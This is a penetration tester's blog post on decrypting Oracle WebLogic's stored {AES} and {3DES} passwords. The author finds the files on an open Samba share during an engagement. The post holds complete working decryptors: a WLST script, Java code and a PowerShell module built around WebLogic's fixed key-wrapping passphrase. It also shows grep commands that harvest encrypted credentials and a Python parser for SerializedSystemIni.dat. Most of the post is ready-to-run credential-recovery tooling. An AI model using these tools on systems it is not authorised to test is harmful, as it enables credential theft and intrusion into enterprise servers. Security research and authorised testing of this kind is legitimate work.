Decrypting the WebLogic Password

Source: Internet
Author: User

During recent penetration tests I have come across several Linux servers with Samba shares open to everyone. Shared files often contain something interesting, whether credentials or sensitive documents, and either helps us. This time I found a folder named "wls1035" in the share. After going through the whole folder I realized it was a WebLogic Server installation. WebLogic is Oracle's Java application server. I did not know much about it: I had seen it in enterprise environments but had never looked closely at its file structure. So I went looking for sensitive information:

user@box:~/wls1035# grep -R "password" *
Binary file oracle_common/modules/oracle.jdbc_12.1.0/aqapi.jar matches
oracle_common/plugins/maven/com/oracle/maven/oracle-common/12.1.3/oracle-common-12.1.3.pom:    <!-- and password for your server here. -->
user_projects/domains/mydomain/bin/startManagedWebLogic.sh:#  to your system password for no username and password prompt
user_projects/domains/mydomain/bin/stopManagedWebLogic.sh:# WLS_PW         - cleartext password for server shutdown
user_projects/domains/mydomain/bin/stopWebLogic.sh:     if [ "${password}" != "" ] ; then
user_projects/domains/mydomain/bin/stopWebLogic.sh:              wlsPassword="${password}"
user_projects/domains/mydomain/bin/stopWebLogic.sh:echo "connect(${userID} ${password} url='${ADMIN_URL}', adminServerName='${SERVER_NAME}')" >>"shutdown-${SERVER_NAME}.py"
user_projects/domains/mydomain/bin/startWebLogic.sh:    JAVA_OPTIONS="${JAVA_OPTIONS} -Dweblogic.management.password=${WLS_PW}"
user_projects/domains/mydomain/bin/startWebLogic.sh:echo "*  password assigned to an admin-level user.  For *"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:    if [ -n "$username" -a -n "$password" ]; then
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       print_info "Investigating username: '$username' and password: '$password'"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$password" >>"$NMBootFile.tmp"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       unset username password
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$Password" >>"$NMBootFile.tmp"
user_projects/domains/mydomain/init-info/config-nodemanager.xml:  <nod:password>{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=</nod:password>
user_projects/domains/mydomain/init-info/security.xml:  <user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user.">
The password is not stored in plaintext but as an encrypted value carrying an {AES} prefix: {AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=. I looked for more values of the same form:
user@box:~/wls1035# grep -R "{AES}" *
user_projects/domains/mydomain/init-info/config-nodemanager.xml:  <nod:password>{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=</nod:password>
user_projects/domains/mydomain/init-info/security.xml:  <user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user.">
user_projects/domains/mydomain/init-info/security.xml:  <user name="supersecretuser" password="{AES}BQp5xBlvsy6889edpwXUZxCbx7crRc5+TNuZHSBl50A=">
user_projects/domains/mydomain/servers/myserver/security/boot.properties:username={AES}/DG7VFmJODIZJoQGmqxU8OQfkZxiKLuHQ69vqYPgxyY=
user_projects/domains/mydomain/servers/myserver/security/boot.properties:password={AES}Bqy44qL0EM4ZqIqxgIRQxXv1lg7PxZ7lI1DLlx7njts=
user_projects/domains/mydomain/config/config.xml:    <credential-encrypted>{AES}Yl6eIijqn+zdATECxKfhW/42wuXD5Y+j8TOwbibnXkz/p4oLA0GiI8hSCRvBW7IRt/kNFhdkW+v908ceU75vvBMB4jZ7S/Vdj+p+DcgE/33j82ZMJbrqZiQ8CVOEatOL</credential-encrypted>
user_projects/domains/mydomain/config/config.xml:    <node-manager-password-encrypted>{AES}+sSbNNWb5K1feAUgG5Ah4Xy2VdVnBkSUXV8Rxt5nxbU=</node-manager-password-encrypted>
user_projects/domains/mydomain/config/config.xml:    <credential-encrypted>{AES}nS7QvZhdYFLlPamcgwGoPP7eBuS1i2KeFNhF1qmVDjf6Jg6ekiVZOYl+PsqoSf3C</credential-encrypted>
The {AES} prefix tells us the value is AES-encrypted. Older WebLogic versions used 3DES instead and the values look like {3DES}JMRazF/vClP1WAgy1czd2Q==. Either way this is reversible encryption rather than a hash, so a decryption key must exist somewhere on the server, and we need to find it. To study the decryption method I downloaded and installed my own WebLogic Server. A Google search turned up a Python script that does the decryption. Conveniently, WebLogic ships with WLST (WebLogic Scripting Tool), a Jython shell that exposes the server's own encryption and decryption classes. Encrypting a value from WLST looks like this:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST
Initializing WebLogic Scripting Tool (WLST) ...
Welcome to WebLogic Server Administration Scripting Shell
Type help() for help on available commands
wls:/offline> pw = encrypt('password')
wls:/offline> print pw
{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=
To decrypt, use the Python script obtained from that article. It is a WLST script, so it runs with java weblogic.WLST rather than a plain Python interpreter:
import os
import sys
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService

# Decrypt one {AES}/{3DES} value with the key material of the domain at agileDomain
def decrypt(agileDomain, encryptedPassword):
    agileDomainPath = os.path.abspath(agileDomain)
    # Reads the domain's SerializedSystemIni.dat and builds the server's own encryption service
    encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)
    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)
    password = ces.decrypt(encryptedPassword)
    print "Plaintext password is:" + password

try:
    if len(sys.argv) == 3:
        decrypt(sys.argv[1], sys.argv[2])
    else:
        print "Please input arguments as below"
        print "                Usage 1: java weblogic.WLST decryptWLSPwd.py <domain_dir> <encrypted_password>"
        print "                Usage 2: decryptWLSPwd.cmd <encrypted_password>"
        print "Example:"
        print "                java weblogic.WLST decryptWLSPwd.py C:\Agile\Agile933\agileDomain {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="
        print "                decryptWLSPwd.cmd {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="
except:
    print "Exception: ", sys.exc_info()[0]
    dumpStack()
    raise
Example:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST decrypt.py . "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="
Initializing WebLogic Scripting Tool (WLST) ...
Welcome to WebLogic Server Administration Scripting Shell
Type help() for help on available commands
Plaintext password is:Password1
This works, but only from inside a WebLogic installation with the domain directory at hand. I wanted to decrypt without a WebLogic environment, so I first looked at which classes the script imports for decryption:

import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService

and which methods it calls on them:

encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)
ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)
password = ces.decrypt(encryptedPassword)

The first call takes the domain path as its parameter; in our example that is /root/wls12130/user_projects/domains/mydomain. SerializedSystemIni.getEncryptionService() reads the file SerializedSystemIni.dat from that domain, normally found in its security folder. The file holds the salt and the encryption key (the key itself is stored wrapped under a fixed passphrase built into WebLogic), which is everything needed to decrypt the stored values. With that file in hand, I wrote a piece of Java code to decrypt an {AES} value:
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.security.GeneralSecurityException;
import java.security.Security;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.PBEParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import org.bouncycastle.jce.provider.BouncyCastleProvider;

public class WebLogicDecrypt {

    // "PBEWITHSHAAND128BITRC2-CBC" is a Bouncy Castle algorithm name; the stock JDK providers do not know it,
    // so bcprov must be on the classpath and registered.
    static {
        Security.addProvider(new BouncyCastleProvider());
    }

    // Fields in SerializedSystemIni.dat are length-prefixed: one length byte, then that many bytes.
    private static byte[] readBytes(InputStream is) throws IOException {
        int len = is.read();
        if (len < 0) {
            throw new IOException("unexpected end of SerializedSystemIni.dat");
        }
        byte[] buf = new byte[len];
        int off = 0;
        while (off < len) {
            int n = is.read(buf, off, len - off);
            if (n < 0) {
                throw new IOException("unexpected end of SerializedSystemIni.dat");
            }
            off += n;
        }
        return buf;
    }

    public static String decryptAES(String serializedSystemIni, String ciphertext)
            throws GeneralSecurityException, IOException {
        // The stored value carries an {AES} prefix in front of the base64 text
        if (ciphertext.startsWith("{AES}")) {
            ciphertext = ciphertext.substring(5);
        }
        byte[] encryptedPassword1 = Base64.getDecoder().decode(ciphertext);
        byte[] salt;
        byte[] encryptionKey = null;
        // Fixed passphrase WebLogic uses to wrap the keys stored in SerializedSystemIni.dat
        String key = "0xccb97558940b82637c8bec3c770f86fa3a391a56";
        char[] password = key.toCharArray();
        // File layout: [len][salt] [version] [len][wrapped 3DES key] and, for version >= 2, [len][wrapped AES key]
        try (FileInputStream is = new FileInputStream(serializedSystemIni)) {
            salt = readBytes(is);
            int version = is.read();
            if (version != -1) {
                encryptionKey = readBytes(is);          // 3DES key, present in every version
                if (version >= 2) {
                    encryptionKey = readBytes(is);      // AES key follows it in version 2 files
                }
            }
        }
        if (encryptionKey == null) {
            throw new IOException("no encryption key found in SerializedSystemIni.dat");
        }
        // Unwrap the stored key: PBE with SHA-1 and RC2-CBC, 5 iterations, keyed by the fixed passphrase and the salt
        SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWITHSHAAND128BITRC2-CBC");
        PBEKeySpec pbeKeySpec = new PBEKeySpec(password, salt, 5);
        SecretKey secretKey = keyFactory.generateSecret(pbeKeySpec);
        PBEParameterSpec pbeParameterSpec = new PBEParameterSpec(salt, 0);
        Cipher cipher = Cipher.getInstance("PBEWITHSHAAND128BITRC2-CBC");
        cipher.init(Cipher.DECRYPT_MODE, secretKey, pbeParameterSpec);
        SecretKeySpec secretKeySpec = new SecretKeySpec(cipher.doFinal(encryptionKey), "AES");
        // Ciphertext layout: 16-byte IV followed by the AES-CBC blocks. Copy everything after the IV rather than
        // a fixed 16 bytes: the credential-encrypted values in config.xml above span several blocks.
        byte[] iv = new byte[16];
        System.arraycopy(encryptedPassword1, 0, iv, 0, 16);
        byte[] encryptedPassword2 = new byte[encryptedPassword1.length - 16];
        System.arraycopy(encryptedPassword1, 16, encryptedPassword2, 0, encryptedPassword2.length);
        IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
        Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec, ivParameterSpec);
        byte[] cleartext = outCipher.doFinal(encryptedPassword2);
        return new String(cleartext, "UTF-8");
    }

    public static void main(String[] args) throws Exception {
        System.out.println(decryptAES(args[0], args[1]));
    }
}
Pass the path of SerializedSystemIni.dat as the first parameter and the ciphertext as the second; the plaintext password is printed. To make the procedure easier to follow without a Java toolchain, the same logic is also available as a PowerShell module (credited in its header to Eric Gruber of NetSPI). It uses the BouncyCastle .NET library for the RC2-based key unwrapping and handles both {AES} and {3DES} values:
<#
    Author: Eric Gruber 2015, NetSPI
    .Synopsis
    PowerShell script to decrypt WebLogic passwords
    .EXAMPLE
    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:\SerializedSystemIni.dat -CipherText "{3DES}JMRazF/vClP1WAgy1czd2Q=="
    .EXAMPLE
    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:\SerializedSystemIni.dat -CipherText "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="
#>
function Invoke-WebLogicPasswordDecryptor
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory = $true, Position = 0)]
        [String]
        $SerializedSystemIni,

        [Parameter(Mandatory = $true, Position = 1)]
        [String]
        $CipherText,

        # Path to BouncyCastle.Crypto.dll, which supplies the PBEWITHSHAAND128BITRC2-CBC key-unwrapping cipher
        [Parameter(Mandatory = $false, Position = 2)]
        [String]
        $BouncyCastle
    )

    if (!$BouncyCastle)
    {
        $BouncyCastle = '.\BouncyCastle.Crypto.dll'
    }
    Add-Type -Path $BouncyCastle

    # Fixed passphrase WebLogic uses to wrap the keys stored in SerializedSystemIni.dat
    $Pass = '0xccb97558940b82637c8bec3c770f86fa3a391a56'
    $Pass = $Pass.ToCharArray()

    # Strip the algorithm prefix with Substring. TrimStart('{AES}') treats its argument as a set of
    # characters and would also eat a leading 'A', 'E' or 'S' of the base64 text.
    $Algorithm = $null
    if ($CipherText.StartsWith('{AES}'))
    {
        $Algorithm = 'AES'
        $CipherText = $CipherText.Substring(5)
    }
    elseif ($CipherText.StartsWith('{3DES}'))
    {
        $Algorithm = '3DES'
        $CipherText = $CipherText.Substring(6)
    }
    $DecodedCipherText = [System.Convert]::FromBase64String($CipherText)

    # File layout: [len][salt] [version] [len][wrapped 3DES key] and, for version >= 2, [len][wrapped AES key]
    $BinaryReader = New-Object -TypeName System.IO.BinaryReader -ArgumentList ([System.IO.File]::Open($SerializedSystemIni, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite))
    try
    {
        $NumberOfBytes = $BinaryReader.ReadByte()
        $Salt = $BinaryReader.ReadBytes($NumberOfBytes)
        $Version = $BinaryReader.ReadByte()
        $NumberOfBytes = $BinaryReader.ReadByte()
        $DesKey = $BinaryReader.ReadBytes($NumberOfBytes)
        $AesKey = $null
        if ($Version -ge 2)
        {
            $NumberOfBytes = $BinaryReader.ReadByte()
            $AesKey = $BinaryReader.ReadBytes($NumberOfBytes)
        }
    }
    finally
    {
        $BinaryReader.Close()
    }

    # No prefix on the value: fall back to whatever the file version implies
    if (!$Algorithm)
    {
        $Algorithm = if ($Version -ge 2) { 'AES' } else { '3DES' }
    }

    # Pick the key by the ciphertext prefix rather than by file version alone: a version-2 file
    # still carries the 3DES key, so {3DES} values left over from before an upgrade decrypt with it.
    if ($Algorithm -eq 'AES')
    {
        if (!$AesKey)
        {
            throw 'Ciphertext is {AES} but this SerializedSystemIni.dat is version 1 and holds no AES key'
        }
        $ClearText = Decrypt-AES -Salt $Salt -EncryptionKey $AesKey -Pass $Pass -DecodedCipherText $DecodedCipherText
    }
    else
    {
        $ClearText = Decrypt-3DES -Salt $Salt -EncryptionKey $DesKey -Pass $Pass -DecodedCipherText $DecodedCipherText
    }
    Write-Host "Password:" $ClearText
}

function Decrypt-AES
{
    param
    (
        [byte[]]
        $Salt,
        [byte[]]
        $EncryptionKey,
        [char[]]
        $Pass,
        [byte[]]
        $DecodedCipherText
    )
    $EncryptionCipher = 'AES/CBC/PKCS5Padding'
    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'

    # Ciphertext layout: 16-byte IV followed by the AES-CBC blocks (several for long credentials)
    $IV = New-Object -TypeName byte[] -ArgumentList 16
    [array]::Copy($DecodedCipherText, 0, $IV, 0, 16)
    $CipherText = New-Object -TypeName byte[] -ArgumentList ($DecodedCipherText.Length - 16)
    [array]::Copy($DecodedCipherText, 16, $CipherText, 0, ($DecodedCipherText.Length - 16))

    # Unwrap the AES key: PBE with SHA-1 and RC2-CBC, 5 iterations, keyed by the fixed passphrase and the salt
    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher, $Salt, 5)
    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher, $Pass, $AlgorithmParameters)
    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)
    $KeyCipher.Init($false, $CipherParameters)
    $Key = $KeyCipher.DoFinal($EncryptionKey)

    $Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)
    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key
    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter, $IV)
    $Cipher.Init($false, $ParametersWithIV)
    $ClearText = $Cipher.DoFinal($CipherText)
    [System.Text.Encoding]::ASCII.GetString($ClearText)
}

function Decrypt-3DES
{
    param
    (
        [byte[]]
        $Salt,
        [byte[]]
        $EncryptionKey,
        [char[]]
        $Pass,
        [byte[]]
        $DecodedCipherText
    )
    $EncryptionCipher = 'DESEDE/CBC/PKCS5Padding'
    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'

    # 3DES values carry no IV: the 8-byte IV is the first 4 bytes of the salt, repeated
    $IV = New-Object -TypeName byte[] -ArgumentList 8
    [array]::Copy($Salt, 0, $IV, 0, 4)
    [array]::Copy($Salt, 0, $IV, 4, 4)

    # Unwrap the 3DES key with the same PBE scheme as above
    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher, $Salt, 5)
    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher, $Pass, $AlgorithmParameters)
    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)
    $KeyCipher.Init($false, $CipherParameters)
    $Key = $KeyCipher.DoFinal($EncryptionKey)

    $Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)
    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key
    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter, $IV)
    $Cipher.Init($false, $ParametersWithIV)
    $ClearText = $Cipher.DoFinal($DecodedCipherText)
    [System.Text.Encoding]::ASCII.GetString($ClearText)
}

Export-ModuleMember -Function Invoke-WebLogicPasswordDecryptor
Below is the test. The module exports Invoke-WebLogicPasswordDecryptor, so that is the name to call after importing it:

PS C:\> Import-Module .\Invoke-WebLogicDecrypt.psm1
PS C:\> Invoke-WebLogicPasswordDecryptor -SerializedSystemIni "C:\SerializedSystemIni.dat" -CipherText "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="
Password: Password1
One more tip for newer WebLogic versions. The version byte in SerializedSystemIni.dat (the byte immediately after the length-prefixed salt; with a 4-byte salt it is the sixth byte of the file) selects which algorithm WLST's encrypt() uses. Patch a copy of the file rather than the live domain's: dropping a real domain's file from 02 to 01 makes WebLogic stop reading the AES key, and every {AES} value in its configuration becomes undecryptable. When the byte is 02, the output of encrypt() in WLST is AES:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST
Initializing WebLogic Scripting Tool (WLST) ...
Welcome to WebLogic Server Administration Scripting Shell
Type help() for help on available commands
wls:/offline> pw = encrypt('password')
wls:/offline> print pw
{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=
When it is changed to 01, encrypt() switches to 3DES:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST
Initializing WebLogic Scripting Tool (WLST) ...
Welcome to WebLogic Server Administration Scripting Shell
Type help() for help on available commands
wls:/offline> pw = encrypt("Password1")
wls:/offline> print pw
{3DES}vNxF1kIDgtydLoj5offYBQ==
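As an added example (not code from the original post, nor from NetSPI's tooling), the Python below parses SerializedSystemIni.dat according to the layout the Java and PowerShell decryptors above read, locates the version byte by parsing instead of assuming it is the sixth byte, and checks which {AES}/{3DES} values from a configuration file a given SerializedSystemIni.dat can decrypt at all. It stops at the wrapped keys: unwrapping them is the RC2-based PBE step the decryptors above do with Bouncy Castle. The sample file bytes are constructed, not a real domain's; the two tokens in the sample configuration are taken from the grep output and the {3DES} example earlier in the post.

```python
"""Parser and sanity checks for WebLogic's SerializedSystemIni.dat (added example).

Layout, as read by the Java and PowerShell decryptors in the text:
    [1 byte: salt length][salt]
    [1 byte: version]                      1 = 3DES only, 2 = 3DES + AES
    [1 byte: key length][wrapped 3DES key]
    [1 byte: key length][wrapped AES key]  present only when version >= 2
The keys stay wrapped under WebLogic's fixed passphrase; this code locates them, it does not unwrap them.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class SystemIni:
    salt: bytes
    version: int
    des_key_wrapped: bytes
    aes_key_wrapped: Optional[bytes]
    version_offset: int  # file offset of the version byte

    def can_decrypt(self, prefix: str) -> bool:
        """Whether values with this prefix ({AES} or {3DES}) are decryptable with this file."""
        if prefix == "{3DES}":
            return True  # every version carries the 3DES key
        if prefix == "{AES}":
            return self.aes_key_wrapped is not None
        return False


def _read_chunk(data: bytes, offset: int) -> Tuple[bytes, int]:
    """Read one length-prefixed chunk, returning (chunk, offset just after it)."""
    if offset >= len(data):
        raise ValueError("truncated file: no length byte at offset %d" % offset)
    length = data[offset]
    chunk = data[offset + 1:offset + 1 + length]
    if len(chunk) != length:
        raise ValueError("truncated file: chunk at offset %d is short" % offset)
    return chunk, offset + 1 + length


def parse_system_ini(data: bytes) -> SystemIni:
    salt, off = _read_chunk(data, 0)
    if off >= len(data):
        raise ValueError("truncated file: missing version byte")
    version_offset = off
    version = data[off]
    des_key, off = _read_chunk(data, off + 1)
    aes_key = None
    if version >= 2:
        aes_key, off = _read_chunk(data, off)
    return SystemIni(salt, version, des_key, aes_key, version_offset)


def set_version(data: bytes, version: int) -> bytes:
    """Return a copy with the version byte rewritten (the trick from the end of the post).

    The byte follows the length-prefixed salt, so it is the sixth byte only for a 4-byte salt.
    Downgrading a live domain's file from 2 to 1 makes WebLogic skip the AES key and every
    {AES} value stops decrypting, so only ever patch a copy.
    """
    if version not in (1, 2):
        raise ValueError("version must be 1 (3DES) or 2 (AES)")
    patched = bytearray(data)
    patched[parse_system_ini(data).version_offset] = version
    parse_system_ini(bytes(patched))  # raises if a file without an AES chunk is marked version 2
    return bytes(patched)


_TOKEN = re.compile(r"\{(?:AES|3DES)\}[A-Za-z0-9+/]+=*")


def find_encrypted_values(text: str) -> List[str]:
    """Extract every {AES}.../{3DES}... token from config.xml, boot.properties and the like."""
    return _TOKEN.findall(text)


def triage(data: bytes, config_text: str) -> Dict[str, bool]:
    """Map each token in config_text to whether this SerializedSystemIni.dat can decrypt it."""
    ini = parse_system_ini(data)
    return {tok: ini.can_decrypt(tok[:tok.index("}") + 1]) for tok in find_encrypted_values(config_text)}


# Constructed sample file (made-up bytes, not a real domain's): 4-byte salt, version 2, two wrapped keys
SAMPLE_INI = (bytes([4]) + b"\x01\x02\x03\x04"
              + bytes([2])
              + bytes([24]) + bytes(range(24))
              + bytes([32]) + bytes(range(32, 64)))
# Two values of the form shown earlier in the post (one {AES} from security.xml, the {3DES} example)
SAMPLE_CONFIG = ('<user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="/>\n'
                 'password={3DES}JMRazF/vClP1WAgy1czd2Q==\n')

if __name__ == "__main__":
    ini = parse_system_ini(SAMPLE_INI)
    print("version %d at offset %d, salt %s" % (ini.version, ini.version_offset, ini.salt.hex()))
    print(triage(SAMPLE_INI, SAMPLE_CONFIG))
    print(triage(set_version(SAMPLE_INI, 1), SAMPLE_CONFIG))
```

Running triage() against a real domain's file and its config.xml before reaching for the decryptors tells you immediately whether a version-1 file has been paired with {AES} values (which cannot work), and set_version() reproduces the 02/01 switch above on a copy without hunting for the byte by hand.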
